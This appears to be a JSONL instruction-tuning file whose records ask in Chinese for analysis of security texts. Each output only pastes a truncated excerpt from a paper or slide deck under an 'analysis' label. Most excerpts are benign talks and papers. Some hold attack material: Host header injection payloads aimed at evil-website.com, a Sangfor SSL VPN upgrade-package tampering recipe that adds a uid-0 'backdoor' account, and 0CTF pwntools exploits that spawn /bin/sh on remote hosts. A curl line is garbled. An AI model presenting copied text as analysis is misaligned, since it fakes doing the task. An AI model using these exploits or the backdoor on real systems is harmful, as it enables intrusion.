{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n全生命周期开发安全的旧瓶与新酒 杨廷锋 @安恒信息 传统的S-SDLC 需求 设计 编码 测试 调研 安全需求 威胁建模 安全设计 安全编码 代码审计 设计用例 漏洞扫描 上线 安全测试 基线检查 运行 监测 应急响应 业务/开发团队 运维团队 传统的S-SDLC 需求 设计 编码 测试 上线 运行 SDLC  目前的S-SDLC服务以 文档为主难以闭环 具体代码实现问题 从目前的服务来看在 落地过程中需要大量 的人力投入但是内 容都是重复性工作 没有时间深入挖掘漏 洞 部分设计可能过于专 业普通的需求经理 和开发人员无法驾驭 整个过程中产生大量 文档无法迅速转换 成数据进入到反馈 环难以适应快速变 化的业务需求 难闭环 难接受 投入大 数据 化低 DevSecOps DevSecOps  DevOps经典框架 DevSecOps  核心思想 每个人都对安全负责将安 全深入到整个软件生命周期  优化沟通交流注重反馈 需求 设计 编码 测试 上线 维护 DevSecOps DevSecOps CA Veracode的调研结果 新酒与S-SDLC 思考方向  1. 能实现自动化的部分尽可能自动 化  2. 将安全工作整合到开发过程  3. 尝试构建标准化基线  4. 文档数据化  5. 尽可能提高开发人员接受程度和 易用性 新酒与S-SDLC 新酒与S-SDLC 安全需求 设计半自 动化生成 安全设 计文档 功能需 求列表 IDE插件 安全设计列 表/平台同 步 编码提示 SDK 配置 闭环安全 设计 本地Java 代码扫描 第三方组 件扫描 容器安全 扫描 应用被动 扫描 源代码扫 描 应用安全 扫描 功能逻辑安 全测试 主机漏洞 扫描 第三方组件 快速扫描 容器安全 快速扫描 资产 管理 风险特征 资产风险  源代码 应用扫描 报告聚合 漏洞管理 对接工单 系统 统计分析 新酒与S-SDLC 需求 设计 开发 测试 发布 安全培训 安全需求 Checklist 需求 安全需求核对 安全设计 安全评审会架 构组件 安全编码培训 安全设计培训 安全设计确认 SAST工具检测 组件检测 确认安全设计确 认表 [核心]功能安全 测试 DAST工具检测 DAST工具 检测 SAST工具 检测 组件检测 动态统计 安全测试/专项培训 发布流程 确认 与之前的安全设计核对 开发自行确认 安全测试确认 缺陷信息 缺陷信息 缺陷信息 安全测试确认 根据统计结果安排培训计划 编码 通用培训 新酒与S-SDLC 对接安全运 维平台实 现DevSecOps 技术理念的 完全落地 数据 共享 工具化自动 化减少投入 数据化方便 分析和共享 关注开发体 验易接受 数据+流程构 成闭环 通过不断调整形成适合企业自身的S-SDLC落地方案 S-SDLC SecOps 自动化 SAST DAST 培训 数据化 DeVSecOps 谢谢 杨廷锋 @安恒信息", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH TZFILE 5 .SH NAME tzfile \\- 时区信息 .SH SYNOPSIS .B #include <tzfile.h> .SH DESCRIPTION 时区信息文件被 .IR tzset(3) 使用, 其开头为特征字符\"TZif\", 以此 标示该文件为时区信息文件, 随后六个字节保留未用. 接下来是六 个\"标准\"字节顺序(高位在前)的四字节 .BR long 类型值, 按顺序描述 如下: .TP .I tzh_ttisgmtcnt 保存在文件中的UTC/local指示器数目. .TP .I tzh_ttisstdcnt 保存在文件中的standard/wall指示器数目. .TP .I tzh_leapcnt 其值保存在文件中的leap second的数目 .TP .I tzh_timecnt 其值保存在文件中的\"变化时间\"数目 .TP .I tzh_typecnt 其值保存在文件中的\"本地时间类型\"数目(非零!) .TP .I tzh_charcnt 保存在文件中的\"时区简写符\"数目 .PP 跟在上面这些头部后的是 .I tzh_timecnt 个\"标准\"字节顺序的四字 节 .BR long 类型值, 以升序排序. 每个值均作为一个变化时间(就像 .IR time (2) 的返回), 系统依赖这些值来计算本地时间变化. 而在此 之后的是 .I tzh_timecnt 个 .BR \"unsigned char\" 类型的一字节值, 这些 值指出了文件中描述的多种\"本地时间\"类型中哪一个与具有相同索 引的变化时间相关. 这些值可作为 .I ttinfo 结构数组的索引. 而 .I ttinfo 结构在文件中随后就有定义, 描述如下: .in +.5i .sp .nf .ta .5i +\\w'unsigned int\\0\\0'u struct ttinfo { long tt_gmtoff; int tt_isdst; unsigned int tt_abbrind; }; .in -.5i .fi .sp 结构包括一个\"标准\"字节顺序的四字节 .BR long 类型值 .I tt_gmtoff, 以及一个一字节的 .I tt_isdst 和一个一字节的 .IR tt_abbrind. 在每 个结构里, .I tt_gmtoff 给出了要被加到UTC的时间, 以秒为单位, .I tt_isdst 表明 .I tm_isdst 是否可通过 .I localtime (3) 设置, 而 .I tt_abbrind 可作为时区简写符的数组索引, 该数组在文件中跟在 .I ttinfo 结构后面. .PP 这样就有 .I tzh_leapcnt 个标准字节顺序的四字节对, 每个四字节 对的第一个值给出一个leap second发生的时间, 就如 .IR time(2) 的返回; 每个四字节对的第二个值给出给定时间之后所实现的总的 leap second数. 四字节对按时间的升序排序. .PP 同样有 .I tzh_ttisstdcnt 个standard/wall指示器, 每个保存了一 个一字节值; 这些指示器指出了变化时间(与本地时间类型相关)是 否被说明为standard time或者wall clock time, 以及当一个时区 文件被用于处理POSIX 格式时区环境变量时是否使用变化时间. .PP 最后, 有 .I tzh_ttisgmtcnt 个UTC/local指示器, 每个保存了一个 一字节值; 这些指示器指出了变化时间(与本地时间类型相关)是否 被说明为UTC 或者local time, 以及当一个时区文件被用于处理 POSIX格式时区环境变量时是否使用变化时间. .PP 如果 .I tzh_timecnt 等于零或者时间参数比文件记录的第一个变化 时间小的话, .I Localtime 就使用文件中的第一个标准时间 .I ttinfo, 或者在没有标准时间结构是就直接使用第一个 .I ttinfo 结构. .SH SEE ALSO newctime(3) .\\\" @(#)tzfile.5 7.11 .\\\" This file is in the public domain, so clarified as of .\\\" 1996-06-05 by Arthur David Olson (arthur_david_olson@nih.gov). .\\\" 中文版维护请mailto: mapping@263.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThrough the Looking-Glass, and What Eve Found There Luca Bruno, Mariano Graziano, Davide Balzarotti, Aurelien Francillon EURECOM {firstname.lastname}@eurecom.fr Abstract Looking-glasses are web applications commonly de- ployed by Autonomous Systems to offer restricted web access to their routing infrastructure, in order to ease re- mote debugging of connectivity issues. In our study, we looked at existing deployments and open-source code to assess the security of this critical software. As a result, we found several flaws and misconfigurations that can be exploited to escalate from a web attack to a remote com- mand execution on backbone routers. This paper summarises the results of our study, and shows how even an attacker with very limited resources can exploit such flaws in operators networks and gain access to core Internet infrastructure. Depending on sys- tems configuration, these attacks may result in traffic dis- ruption and global BGP routes injection, with severe im- plications for the security of the Internet. 1 Introduction The Internet is composed by a large number of Autonou- mous Systems (AS) which cooperate to exchange and carry data across their links. Several intra- and extra- AS routing protocols running on backbone routers are responsible for distributing routes in the control plane, across the world. Some of those protocols, however, have not been designed with security in mind and are not specifically resilient against malicious agents [1]. For example, the Border Gateway Protocol (BGP) [2] takes care of extra-AS routes distribution, but any mali- cious or wrongly configured AS can hijack and re-route prefixes owned by other ASes. Therefore, most of In- ternet routing relies on the assumption that no malicious BGP routers are ever allowed to announce bogus routes, and that the existing routers are benign and properly se- cured. The aim of our study is to show how these assumptions do not hold true in the real-world, by focusing on a series of software fl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Host Header Injection ## Introduction HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as \"Host header injection\" attacks. ## Where to find In the feature where the website can send email to us. For example forgot password / newsletter. ## How to exploit 1. Change the host header ``` GET /index.php HTTP/1.1 Host: evil-website.com ... ``` 2. Duplicating the host header ``` GET /index.php HTTP/1.1 Host: vulnerable-website.com Host: evil-website.com ... ``` 3. Add line wrapping ``` GET /index.php HTTP/1.1 Host: vulnerable-website.com Host: evil-website.com ... ``` 4. Add host override headers ``` X-Forwarded-For: evil-website.com X-Forwarded-Host: evil-website.com X-Client-IP: evil-website.com X-Remote-IP: evil-website.com X-Remote-Addr: evil-website.com X-Host: evil-website.com ``` How to use? In this case im using \"X-Forwarded-For : evil.com\" ``` GET /index.php HTTP/1.1 Host: vulnerable-website.com X-Forwarded-For : evil-website.com ... ``` 5. Supply an absolute URL ``` GET https://vulnerable-website.com/ HTTP/1.1 Host: evil-website.com ... ``` ## References * [PortSwigger](https://portswigger.net/web-security/host-header/exploiting)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeaconEye的技术原理 0x00 前言 刚开始群里小伙伴讨论BeaconEye的时候我不以为然无外乎就是内存扫描嘛对抗手法一大堆 分分钟给他搞搞失效 最后呢在我仔细研究之后以后再也不敢装逼了 0x01 前置知识 由于我二进制也是个菜逼搞清楚BeaconEye需要掌握一些前置知识 windows内存管理API 通过这个图我们知道我们经常使用malloc等c库函数实际操作的是堆内存而堆内存来源于虚拟内存 这儿重点就在于堆内存的管理在windows种堆内存是共享资源是被所有线程共享的资源因此不管 是主线程还是子线程使用malloc等函数分配的内存都是在堆内存里面划出的一块儿区域这个区域还 能被多个线程操作 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 1 / 4 - Welcome to www.red-team.cn 这个堆内存的创建有2种方式1种是进程创建的时候系统会自动创建一个堆内存默认堆第2种 是程序使用HeapCreate等堆操作的函数自己创建不管是系统创建还是自己创建的堆都可以通过PEB找 到堆内存的地址 这就是BeaconEye的思路通过PEB去查找堆地址然后使用yara规则扫描堆内存那为什么堆内存里 面有Beacon的配置信息呢@d_infinite 同学的文章https://mp.weixin.qq.com/s/mh8iYU6lQohsVrIN M2uvCg详细的说了Beacon配置信息的组成以及被写入堆的过程重点就是下图这个就是 beacon.dll自身代码引用@d_infinite 同学的图 我框住的内存分配函数是的beacon.dll把自身配置写入到了堆内存中而且是解密以后写入的因此 在堆上beacon配置是明文的 Author: L.N. / Date: 2021-09-07 Produced by AttackTeamFamily No. 2 / 4 - Welcome to www.red-team.cn 我们通过以上思路基本让我们的植入体无处遁形我们常见的对抗方式大多以休眠加密混淆修改内 存权限抹去关键函数花指令等等等以上的对抗手法大多是针对beacon.dll在内存中的留存形式上 对抗而beacon自身代码执行留下的痕迹在不能自定义beacon的情况下很难操作beacon自身代码行 为因此BeaconEye的这个思路思路挺好但是程序实现有小BUG以及3.x版本yara规则也需要修 改在4.3以及以前版本真是神挡杀人佛挡杀佛我们只能修改beacon.dll代码让它不在堆上去保存 明文的beacon配置而这需要cs4.4 0x02 Beacon代码实现 堆内存查找这涉及到PEB的数据结构以及堆的数据结构小伙伴们自行google学习 这个过程被@WBGlll发现了一个BUG这也是为什么我们很多小伙伴在测试远程线程注入beacon的时 候没有被侦测到的问题根源原文https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-gong-ji-fan g-yu/untitled-1@WBGlll大哥修改后的代码 public List<long> Heaps { get { int numHeaps; long heapArray; if (Is64Bit) { numHeaps = ReadMemory<int>(PebAddress + 0xE8); heapArray = ReadPointer(PebAddress + 0xF0); } else { numHeaps = ReadMemory<int>(PebAddress + 0x88); heapArray = ReadPointer(PebAddress + 0x90); } var heaps = new List<long>(); for (int idx = 0; idx < numHeaps; ++idx) { var heap = ReadPointer((ulong)(heapArray + (idx * (Is64Bit ? 8 : 4)))); heaps.Add(heap); } return heaps; } } public List<long> Heaps { get { int numHeaps; long heapArray; if (Is64Bit) { numHeaps = ReadMemory<int>(PebAddress + 0xE8); heapArray = ReadPointer(PebAddress + 0xF0); } else { numHeaps = ReadM", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@jtpereyda curl 'fj48914309qr2p3 rim e/resd,fa;wf.,4vpl6v3/5p.vl;ul.6.ty[5p16[4[1]4\\5][13]5123' curl 'fj48914309qr2p3 rim e/resd,fa;wf.,4vpl6v3/5p.vl;ul.6.ty[5p16[4[1]4\\5][13]5123' https://apps.dtic.mil/dtic/tr/fulltext/u2/a558209.pdf https://community.synopsys.com/s/question/0D53400004D2fALCAZ from boofuzz import * # ... session = Session( target=Target( connection=SocketConnection(target_host, target_port, proto='tcp'), ) ) s_initialize(\"user\") s_string(\"USER\") s_delim(\" \") s_string('ascii') s_static(\"\\r\\n\") s_initialize(\"pass\") s_string(\"PASS\") s_delim(\" \") s_string('ascii') s_static(\"\\r\\n\") s_initialize(\"stor\") s_string(\"STOR\") s_delim(\" \") s_string(\"AAAA\") s_static(\"\\r\\n\") s_initialize(\"retr\") s_string(\"RETR\") s_delim(\" \") s_string(\"AAAA\") s_static(\"\\r\\n\") session.connect(s_get(\"user\")) session.connect(s_get(\"user\"), s_get(\"pass\")) session.connect(s_get(\"pass\"), s_get(\"stor\")) session.connect(s_get(\"pass\"), s_get(\"retr\")) 0000 00 04 00 01 00 06 00 00 17 00 e4 88 00 00 08 00 0010 45 00 00 60 e6 c3 40 00 40 06 3d c5 0a 00 01 05 0020 0a 00 01 0b d6 df 08 01 94 68 ae 69 f4 2f b6 0e 0030 80 18 00 d2 16 62 00 00 01 01 08 0a 00 0f 48 a9 0040 1c 62 1b a3 80 00 00 28 d1 82 5e 7d 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 03 00 00 00 00 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 04 00 01 00 06 00 00 17 00 2a ed 00 00 08 00 0010 45 00 00 60 13 c7 40 00 40 06 12 af 0a 00 00 11 0020 0a 00 00 12 03 1f 08 01 ff 30 1f 56 86 fd 15 cb 0030 80 18 00 d2 14 75 00 00 01 01 08 0a 07 f3 0c 90 0040 07 f1 8c fd 80 00 00 28 5c 1c ef 1b 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 04 00 00 00 00 0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 04 00 01 00 06 00 00 17 00 e4 88 00 00 08 00 0010 45 00 00 60 e6 c3 40 00 40 06 3d c5 0a 00 01 05 0020 0a 00 01 0b d6 df 08 01 94 68 ae 69 f4 2f b6 0e 0030 80 18 00 d2 16 62 00 00 01 01 08 0a 00 0f 48 a9 0040 1c 62 1b a3 80 00 00 28 d1 82 5e 7d 00 00 00 00 0050 00 00 00 02 00 01 86 a3 00 00 00 03 00 00 00 00", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLets Sink The Phishermens Boat! =DEFCON 16 @ Las Vegas, Nevada= Teo Sze Siong, <teo.sze.siong@f-secure.com> F-Secure Corporation Why this topic?  Internet banking has become more and more preferred choice  Yet, many people don't understand the risk they are facing in online banking Do you think the following practices Sunday, 10 August, 2008 Page 2  Keep antivirus software updated  Use online banking on SSL-enabled websites only  Use online banking on trusted machine only  Use 2-factor authentication security feature  Use latest web browser with fully patched plug-ins Source: http://www.news.com.au/business/story/0,23636,22561818-5013952,00.html Do you think the following practices protect you from phishing attack? Answer is NO! How serious now?  Billion dollar losses caused by phishing attacks  Banks can't simply reverse transactions - legal issues Sunday, 10 August, 2008 Page 3 Source: http://www.gartner.com/it/page.jsp?id=565125&format=print How serious now?  Currently, there is no complete automated solution to detect phishing accurately  It is all over the world targeting different nationalities and different banks!  Phishing techniques used are getting more sophisticated than before Sunday, 10 August, 2008 Page 4 Source: http://www.antiphishing.org/reports/apwg_report_jan_2008.pdf Commonly used techniques in phishing  DNS modification / cache poisoning a.k.a. pharming  HTML / Javascript content with visual similarity (even Flash-based)  Spoofed source email address  ARP poisoning to redirect traffic  API hooking (user mode / kernel mode) Sunday, 10 August, 2008 Page 5  API hooking (user mode / kernel mode)  Browser plug-in (BHO mainly targeting Internet Explorer)  Similar URLs / obfuscated encodings  Hosting websites on fast flux network (usually botnet machines)  Uses drive-by downloads to infect Trojan via software vulnerability Flash-based phishing website Sunday, 10 August, 2008 Page 6 Source: http://www.f-secure.com/weblog/archives/00001066.html Example 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPhishing and Online Scams in China Joey Zhu Trend Micro Inc. Who I am:  Worked for Trend Micro Inc. (2005  Present)  Rich experience with virus sandbox (2005  2008)  Rich experience as a JavaScript analyzer (2008  Present)  Web threat expert, focusing on HTML/Javascript exploits  Now interested in phishing in China Only 3% of phishing occurs in China Do you believe this number? All vendors dont focus on China 100+ phishing QQ sites found among 4M traffic (reported by Trend Micro) Phishers bonus: Large population QQ.com: 640 Million Taobao.com: 300 Million Passengers at Spring Festival: 280 Million Global WoW: 10 Million Hot Phishing Event target www.boc.com  Over 500 phishing site in Feb  Spread via SMS message  Also includes other banks  CEB/SDB Vulnerable Validation Procedures E-Token from www.boc.com  Password invalid after 60 seconds  www.bocxx.com Phishing in China  More prevalent than drive-by websites  Three categories:  lottery scams (most common), fake websites, fraudulent websites fake websites/仿冒著名网站 仿冒著名网站 仿冒著名网站 仿冒著名网站 fraudulent websites /欺诈网站 欺诈网站 欺诈网站 欺诈网站 lottery scam/中奖骗局 中奖骗局 中奖骗局 中奖骗局 Lottery Scam beyond traditional private information leakage  Over 70% of scams, making it the No. 1 category  Fake webpages such as QQ, games & CCTV A typical lottery scam Step 1. IM/Email message: Lucky you, go won a prize Step 2. A phishing webpage pretends to be the official site like QQ.com or CCTV.com,  Step 3. After clicking, the phishing site will ask users to pay income tax or notary fees first. Where does the Phishing URL come from? Chinese Instant Messenger  A special phenomenon in China  Notably from QQ & Aliwangwang/阿里旺旺 阿里旺旺 阿里旺旺 阿里旺旺 Where does the Phishing URL come from? Comprised of a website & injected with Iframe in order to deliver phishing message Money Driven Fraudulent Websites New Phishing without Target Brand Delivered by AdWords Scams with Stocks & Securities for membership fees Taobao Phishing == Money  Over 80 billion dollars in 2010  AliP", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpen Source Intelligence Methods and Tools A Practical Guide to Online Intelligence Nihad A. Hassan Rami Hijazi Open Source Intelligence Methods and Tools: A Practical Guide to Online Intelligence ISBN-13 (pbk): 978-1-4842-3212-5 ISBN-13 (electronic): 978-1-4842-3213-2 https://doi.org/10.1007/978-1-4842-3213-2 Library of Congress Control Number: 2018948821 Copyright  2018 by Nihad A. Hassan, Rami Hijazi This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark. The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to proprietary rights. While the advice and information in this book are believed to be true and accurate at the date of publication, neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or omissions that may be made. The publisher makes no warranty, express or implied, with respect to the material contained herein. Managing Director, Apress Media LLC: Welmoed Spahr Acquisitions Editor: Susan McDermott Development Editor: Laura Berendson Coordinating Editor: Rita Fernando Cover designed by eStudioCalamar Cover image designed by Freepik (ww", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nsslvpn tips记录 升级包密码获取 众所周知sslvpn的补丁包其实是个压缩包diff补丁包是需要密码的 先放一个包结构 32位原始压缩包md5值|00|原始压缩包 众所周知皮卡丘升级是依靠 SANGFOR_Updater 来进行升级的那么升级包密码就在这个里面二话不说 ida启动没加壳很容易就找到了 压缩包结构 压缩包分为两类 cssu 合集类 ssu单包类 ssu 包结构结构 32位原始压缩包md5值|00|原始压缩包 目录结构 cssu包结构 ssu组合+upgrade.conf(升级配置文件) sslvpn443 端口的一些TIPS /sftmpfs/etc/htdocs/com/ 但是在此目录下写入文件重启后消失但如果在这个位 置 /sf/htdocsback/com/ 写入重启后文件会覆盖到 /sftmpfs/etc/htdocs/com/ (最新版本下 此目 录是无法PHP的解析的) 没啥意义的后台代码执行修了 没啥意义的洞只是diff代码时需要root权限时有用而且最新版本还修了  app1 //两次gzip压缩的升级包文件  apppre //可能是升级检测脚本  appsh1 //可能是升级主脚本  appversion  cfgversion  package.conf  readme.txt //说明文件 前置条件 51111端口开放 管理员密码 利用 解压压缩包 在appsh1中添加用户添加命令 这里注意需要分来写先加用户再加密码 压缩回去密码为 greatsinfor 修改后缀为ssu计算md5值 按照如下格式填充 32位原始压缩包 md5值|00|原始压缩包 useradd -o -u 0 backdoor echo \"123COM123\" | passwd backdoor --stdin 执行完成 登陆", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhat To Do When Your Data Winds Up p Where It Shouldnt Don M. Blumenthal Defcon 16 Defcon 16 Las Vegas, Nevada August 9 2008 August 9, 2008  2008  Don M. Blumenthal Disclaimer Disclaimer Opinions expressed are my own and Opinions expressed are my own and intended for informational purposes. They should not be attributed to any y y organization or used as a substitute for direct legal advice. g  2008  Don M. Blumenthal Questions and more Questions Questions and more Questions What is PII What is PII What is a Security Breach To Whom Does the Law Apply To Whom Does the Law Apply When and How Is Notice Given Whom Do I Have to Notify? What Do I Offer? How Do I Plan Ahead?  2008  Don M. Blumenthal PII Definition - AICPA/CICA PII Definition AICPA/CICA Information related to identified or identifiable individual Name, Address, Telephone, SS # or Other Govt ID Numbers Other Govt ID Numbers Employer, Employment History Credit Card Numbers, Credit History, P h Hi t Purchase History Personal or Family Financial or Medical Information  2008  Don M. Blumenthal PII Also May Include PII Also May Include Sensitive PII PII Specifying Medical or Health Conditions Racial or Ethnic Origin P liti l O i i Political Opinions Religious or Philosophical Beliefs Trade Union Membership Trade Union Membership Sexual Preferences  2008  Don M. Blumenthal Legal Framework Overview US - Sectoral approach to security and i ith t h k f l privacy with patchwork of laws Specific types of records Specific types of institutions Specific types of institutions EU Model - Societal approach EU member states EU member states Argentina, Australia, Canada, Switzerland Hybrid Model Hybrid Model Japan, Chile, APEC No law No law China, India, Philippines, most of South America  2008  Don M. Blumenthal Scope Scope Laws concern Laws concern Personal information Personally Identifiable Information Personally Identifiable Information Sensitive Consumer Information Dont forget Non-consumer data; e g trade secrets Non c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n前言 周六晚上本来打开电影网站准备看电影的时候导师发来张图说这个 exe 在添加进启动项的时候 360没有拦截就想着我们能不能也利用下 先说结论分析后我个人感觉利用难度较大价值不高如果有师傅可以成功利用的话请疯狂call 我 首先我的第一反应是白加黑但很快被当头一棒不能想当然还是要老老实实分析切忌主观臆断 先了解下这个程序看到这里喜忧参半看描述似乎确实有木马伪装成这个程序但这个程序有签名 下面要做的就是分析这个程序的加载方式了这里我选择的火绒剑来监控 首先删除这个注册表项然后重装vmtools安装完成后 vmtoolsd.exe 会被写进启动项我们做的 就是分析安装过程中该值是如何被写进注册表的 删除该项 重装vmtools 火绒剑监控注册表 安装完成导出日志就好了这里导出有18m9w行的日志. 日志分析 这里个人感觉没必要全部都看里面很多日志都是重复的而且在不一定可以利用的情况下首先搞清 楚技术点才最重要 看到这里是调用 Msiexec.exe 来进行安装查了一下 Msiexec.exe 在安装程序时都会调用该程序 emm这里先不管 不知道为什么还涉及到了java 看到这里已经不报希望了涉及到了硬件的操作 RDP session难道还涉及 RDP协议 又有信任证书的问题 可能是监测局域网吧毕竟是在虚拟机中 调用Wshshell wscript 对象可以创建两个COM对象 WshShell 和 WshNetwork 这里倒是可以理 解毕竟 WshShell可以实现注册表的读写操作 这里也能明白vmtools安装的时候是一个自解压包 在安装的时候调用很多驱动 加密签名 这里就不明白了怎么还有TCP/IP的接口 总结 看到这里差不多了一言难尽总之看着就不好利用原因如下 这里限于作者水平有限抛砖引玉 如果有师傅研究出利用方法请疯狂call我 1.vmtoolsd.exe 这个程序本身有加密签名 2.安装过程中有驱动操作 3.校验了证书完整性 4.复杂的tcpipwinsock操作...这里没看懂 5........", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0CTF-Writeup Aut hor-Nu1L PWN char 明显的栈溢出但输入限制了只能是可打印字符各种找rop gadget通过int 0x80执 行execve EXP: from pwn import * VERBOSE = 1 LOCAL = 1 DEBUG = 0 if VERBOSE: context.log_level = 'debug' if LOCAL: io = process('./char') if DEBUG: gdb.attach(io) else: io = remote('202.120.7.214', 23222) #raw_input('go?') io.recvuntil('GO : ) \\n') xor_eax = 0x55656b52 inc_eax = 0x555f5b7a int_80 = 0x55667177 xchg_ebx_edi = 0x55623b42 inc_edx = 0x555e7a4b mov_eax_edx = 0x555b3454 pop_esi = 0x55686c72 xchg_eax_edi = 0x556f6061 pop_ecx = 0x556d2a51 null = 0x55664128 pop_edx = 0x555f3555 payload = p32(xor_eax) * 8 payload += p32(inc_edx) * 4 + p32(mov_eax_edx) + p32(pop_esi) + p32(xor_eax) + p32(x chg_eax_edi) + p32(xchg_ebx_edi) + p32(xor_eax) + p32(pop_ecx) + p32(null) + p32(pop _edx) + p32(null) + p32(null) + (p32(inc_eax) + p32(xor_eax) * 3) * 11 + p32(int_80) payload += '/bin/sh' io.sendline(payload) io.interactive() 0CTF-Writeup 1/22 diethard 程序自己实现了一个堆的分配机制bins以8的幂来分类通过bitmap来标志bin是否有 使用off-by-one修改bitmap产生overlapping chunk覆盖buffer指针泄漏libc地址 再改got表执行system(/bin/sh) 0CTF-Writeup 2/22 EXP: from pwn import * VERBOSE = 1 DEBUG = 0 LOCAL = 1 if VERBOSE: context.log_level = 'debug' if LOCAL: io = process('./diethard') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') else: io = remote('202.120.7.194', 6666) libc = ELF('./libc.so') def add_msg(len, content): io.recvuntil(' 3. Exit\\n\\n') io.sendline('1') io.recvuntil('Input Message Length:\\n') io.sendline(str(len)) io.recvuntil('Please Input Message:\\n') io.sendline(content) def del_msg(id): io.recvuntil(' 3. Exit\\n\\n') io.sendline('2') io.recvuntil('1. ') addr = io.recvn(8) io.recv() # io.recvuntil('Which Message You Want To Delete?') io.sendline(str(id)) return addr elf = ELF('./diethard') payload1 = 'content' add_msg(len(payload1), payload1) payload2 = 'A' * 2015 add_msg(len(payload2), payload2) add_msg(len(payload2), payload2) payload3 = 'A' * 8 + p64(0x20) + p64(elf.got['puts']) + p64(0x400976) payload3 = payload3.ljust(2017, 'A') add_msg(len", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMedia over Coaxial Alliance (MoCA): Operation and Security Posture Andrew Hunt Volgeneau School of Engineering,George Mason University Fairfax, VA ahunt5@masonlive.gmu.edu Abstract Media over Coax Alliance (MoCA) is a protocol specification to enable assured high-bandwidth connections for the high demands of voice, video, and high-speed data connections  the triple play. Verizon, Cox, Comcast, and many other service providers have adopted MoCA as the de facto networking technology used to provide in-home broadband services. This paper reviews MoCA and its common implementations, assessing vulnerabilities that are presented by the protocol and its use. I. INTRODUCTION MoCA is a MAC/PHY specification that allows the use of Ethernet and video protocols over coaxial wiring common to most domiciles[1]. Supported by an alliance of industry partners, it also enables the connection of the last mile network distribution topologies to the home via FIOS (fiber- optic), cable, or satellite delivery methods. MoCA protocols enable devices with on-board protocol support, such as DVRs and Media Center computers, to connect to the in-home network provided by the cable-modem router, e.g. an ActionTec wireless coaxial router [2]. The router serves as an uplink to bridge the incoming MoCA Wide Area Network (WAN) signal from the satellite dish, optical network terminator (ONT) or cable distribution node with the in-home MoCA LAN signals [3]. This enables the router to support the concept of triple play: video, voice, and data provision directly from the provider over Ethernet, wireless, and MoCA networking services within the home [4]. II. OPERATION A. MoCA in the Home MoCA acts as a direct bridging technology, converting Ethernet (802.3) data, video and satellite signals to assigned channels over the coaxial cabling [5]. The physical layer (PHY) utilizes a 50MHz-wide, orthogonal frequency division multiplex (OFDM) signalled channel, seven of which are defined between bands 875MHz and 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"The further the spiritual evolution of mankind advances, the more certain it seems to me that the path to genuine religiosity does not lie through the fear of life, and the fear of death, and blind faith, but through striving after rational knowledge.\" -Albert Einstein Industrial Cyber Security From the Perspective of the Power Sector Revision 1 July 28th 2010 Authored by: Wade Polk Paul Malkewicz Jaroslav Novak Industrial Cyber Security: From the Perspective of the Power Sector Page 2 of 65 July 28th 2010 Presented at DEFCON 18, July 29th through August 1st 2010, Riviera Hotel, Las Vegas NV Abstract Industrial control systems are flexible constructs that result in increased efficiency and profitability, but this comes at the cost of vulnerability. In past years, industrial cyber security has been mostly ignored due to cost, lack of understanding, and a low incidence rate. More and more these systems rely on commercial, off the shelf software which increases the ease and likelihood of an attack. Today, we face growing threats from individuals, foreign governments and competing companies. The risks have increased by orders of magnitude. This paper will provide an overview of control components common to the power industry, common vulnerabilities, and the current situation with industrys cyber infrastructure as well as worst case scenarios. This paper provides a short overview of standards and governances followed by recommendations to facilitate achieving compliance with overlapping governances. Industrial Cyber Security: From the Perspective of the Power Sector Page 3 of 65 July 28th 2010 Presented at DEFCON 18, July 29th through August 1st 2010, Riviera Hotel, Las Vegas NV ABSTRACT ................................................................................................................................................................... 2 PREFACE .................................................................................................................", "category": "text_analysis", "source": "security_papers"}
